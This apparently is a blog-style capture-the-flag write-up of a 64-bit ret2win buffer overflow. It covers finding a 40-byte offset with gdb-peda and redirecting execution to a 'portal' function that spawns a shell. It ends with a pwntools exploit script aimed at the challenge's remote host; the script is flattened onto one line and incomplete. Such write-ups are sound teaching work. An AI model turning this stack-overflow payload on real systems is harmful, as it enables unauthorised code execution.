This is a basic ret2win challenge from jornadas CTF. Here we just need to buffer overflow and reach the RIP/Return region and then call the function to get the shell.
First, we check the file type and the memory protection involved with the binary.
We can see this is a 64bit binary, dynamically linked and not stripped. Makes our life easier. NX bit is enabled, So we cannot execute anything from the stack.
We will find the overflow offset to EIP using gdb-peda.
We can see that RBP has been overwritten with “A)AAEAAa”. We check this value in the pattern we gave and add 8 to get the offset value to reach the RIP/Return address.
Now we add 8 to this value which is 40. So 40 Junk characters to buffer overflow and reach RIP/Return address region.]
Now, let’s check the function present in this binary.
We have a suspicious function “portal”. Let us disassemble it.
There we go! We have a system call, so we can pop the shell if you call this address.
Here is a code in python that will make your life easier.
from pwn import *#p = process("./bin3")p = remote("challenges.ctf.cert.rcts.pt" , 58209)ret = p64(0x0000000000401016)overwrite = b"A"*40
portal = p64(0x0000000000401152)payload = overwrite + ret + portal # ret used due to ubuntu issue with movaps . read https://stackoverflow.com/questions/60729616/segfault-in-ret2libc-attack-but-not-hardcoded-system-call to understand about the issue.p.recvuntil(b"In order to open the Portal, you need magic words:")
Running this code should pop you a shell.
Hope you understood the challenge. Do check out my other blogs.
Don’t forget to give some claps if you reached here :) Follow me for more write-ups.